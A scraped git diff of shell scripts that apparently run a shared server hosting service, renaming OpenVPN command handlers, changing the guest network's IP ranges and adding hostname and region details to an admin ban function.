[[ ${ARGS[1]} == 'up' ]] && cmd_ovpn_up
|
||||||
[[ ${ARGS[1]} == 'show' ]] && cmd_vpn_show
|
[[ ${ARGS[1]} == 'show' ]] && cmd_ovpn_show
|
||||||
[[ ${ARGS[1]} == 'del' ]] && cmd_vpn_del
|
[[ ${ARGS[1]} == 'del' ]] && cmd_ovpn_del
|
||||||
[[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del
|
[[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del
|
||||||
# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
|
# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
|
||||||
cmd_vpn_help
|
cmd_ovpn_help
|
||||||
|
|
||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
|
@ -19,7 +19,9 @@ USER_UL_RATE="$5"
|
|||||||
LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
|
LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
|
||||||
|
|
||||||
# Create 'empty' for ZSH's prompt to show WG EXIT
|
# Create 'empty' for ZSH's prompt to show WG EXIT
|
||||||
[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
|
# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
|
||||||
|
# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still.
|
||||||
|
:>"${LID_PROMPT_FN}"
|
||||||
|
|
||||||
set -e
|
set -e
|
||||||
LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
|
LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
|
||||||
|
@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252
|
|||||||
SF_MULLVAD_ROUTE=10.124.0.0/22
|
SF_MULLVAD_ROUTE=10.124.0.0/22
|
||||||
SF_NOVPN_IP=172.20.0.240
|
SF_NOVPN_IP=172.20.0.240
|
||||||
SF_NGINX_IP=172.20.1.80
|
SF_NGINX_IP=172.20.1.80
|
||||||
SF_RPC_IP=10.11.0.2
|
SF_RPC_IP=100.126.224.2
|
||||||
SF_GSNC_IP=172.22.0.21
|
SF_GSNC_IP=172.22.0.21
|
||||||
SF_SSHD_IP=172.22.0.22
|
SF_SSHD_IP=172.22.0.22
|
||||||
SF_DOH_IP=172.23.0.2
|
SF_DOH_IP=172.23.0.2
|
||||||
@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16
|
|||||||
SF_NET_VPN=172.20.0.0/24
|
SF_NET_VPN=172.20.0.0/24
|
||||||
SF_NET_VPN_DNS_IP=172.20.0.53
|
SF_NET_VPN_DNS_IP=172.20.0.53
|
||||||
|
|
||||||
SF_NET_LG=10.11.0.0/24
|
SF_NET_LG=100.126.224.0/22
|
||||||
SF_NET_LG_ROUTER_IP=10.11.0.1
|
SF_NET_LG_ROUTER_IP=100.126.224.1
|
||||||
SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254
|
SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254
|
||||||
|
|
||||||
SF_NET_VPN_ROUTER_IP=172.20.0.2
|
SF_NET_VPN_ROUTER_IP=172.20.0.2
|
||||||
|
|
||||||
|
@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow
|
|||||||
CG="\e[1;32m" # green
|
CG="\e[1;32m" # green
|
||||||
CR="\e[1;31m" # red
|
CR="\e[1;31m" # red
|
||||||
CC="\e[1;36m" # cyan
|
CC="\e[1;36m" # cyan
|
||||||
# CM="\e[1;35m" # magenta
|
CM="\e[1;35m" # magenta
|
||||||
CW="\e[1;37m" # white
|
CW="\e[1;37m" # white
|
||||||
CB="\e[1;34m" # blue
|
CB="\e[1;34m" # blue
|
||||||
CF="\e[2m" # faint
|
CF="\e[2m" # faint
|
||||||
|
@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest"
|
|||||||
_sf_basedir="/sf"
|
_sf_basedir="/sf"
|
||||||
_sf_dbdir="${_sf_basedir}/config/db"
|
_sf_dbdir="${_sf_basedir}/config/db"
|
||||||
unset _sf_isinit
|
unset _sf_isinit
|
||||||
|
_sf_region="$(hostname)"
|
||||||
|
|
||||||
_sf_deinit()
|
_sf_deinit()
|
||||||
{
|
{
|
||||||
@ -507,27 +508,29 @@ lgrm()
|
|||||||
lgban()
|
lgban()
|
||||||
{
|
{
|
||||||
local fn
|
local fn
|
||||||
|
local hn
|
||||||
local ip
|
local ip
|
||||||
local msg
|
local msg
|
||||||
local lid
|
local lglid="${1}"
|
||||||
|
|
||||||
_sf_init
|
_sf_init
|
||||||
lid="${1}"
|
|
||||||
shift 1
|
shift 1
|
||||||
|
|
||||||
fn="${_self_for_guest_dir}/${lid}/ip"
|
fn="${_self_for_guest_dir}/${lglid}/ip"
|
||||||
[[ -f "$fn" ]] && {
|
[[ -f "$fn" ]] && {
|
||||||
ip=$(<"$fn")
|
ip=$(<"$fn")
|
||||||
|
fn="${_self_for_guest_dir}/${lglid}/hostname"
|
||||||
|
[[ -f "${fn}" ]] && hn=$(<"${fn}")
|
||||||
fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
|
fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
|
||||||
[[ ! -e "$fn" ]] && {
|
[[ ! -e "$fn" ]] && {
|
||||||
[[ $# -gt 0 ]] && msg="$*\n"
|
[[ $# -gt 0 ]] && msg="$*\n"
|
||||||
echo -en "$msg" >"${fn}"
|
echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}"
|
||||||
}
|
}
|
||||||
echo "Banned: $ip"
|
echo "Banned: $ip"
|
||||||
}
|
}
|
||||||
|
|
||||||
lgstop "${lid}" "$@"
|
lgstop "${lglid}" "$@"
|
||||||
#_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server.
|
#_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server.
|
||||||
|
|
||||||
_sf_deinit
|
_sf_deinit
|
||||||
}
|
}
|
||||||
|
@ -6,7 +6,7 @@
|
|||||||
|
|
||||||
[[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
|
[[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
|
||||||
|
|
||||||
cmd_vpn_help() {
|
cmd_ovpn_help() {
|
||||||
echo -en "\
|
echo -en "\
|
||||||
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
|
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
|
||||||
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
|
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
|
||||||
@ -241,7 +241,7 @@ vpn_stop() {
|
|||||||
nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
|
nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
|
||||||
}
|
}
|
||||||
|
|
||||||
cmd_vpn_show() {
|
cmd_ovpn_show() {
|
||||||
load_lg
|
load_lg
|
||||||
[[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
|
[[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
|
||||||
echo -e "${C}"
|
echo -e "${C}"
|
||||||
@ -252,12 +252,12 @@ cmd_vpn_show() {
|
|||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
|
|
||||||
cmd_vpn_up() {
|
cmd_ovpn_up() {
|
||||||
local str
|
local str
|
||||||
load_lg
|
load_lg
|
||||||
local link_mtu
|
local link_mtu
|
||||||
|
|
||||||
[[ -z "$R_CONFIG" ]] && cmd_vpn_help
|
[[ -z "$R_CONFIG" ]] && cmd_ovpn_help
|
||||||
WG_DEV="vpnEXIT"
|
WG_DEV="vpnEXIT"
|
||||||
# echo "PID=$PID"
|
# echo "PID=$PID"
|
||||||
|
|
||||||
@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect.
|
|||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
|
|
||||||
cmd_vpn_del() {
|
cmd_ovpn_del() {
|
||||||
load_lg
|
load_lg
|
||||||
|
|
||||||
vpn_stop
|
vpn_stop
|
Loading…
Reference in New Issue
Block a user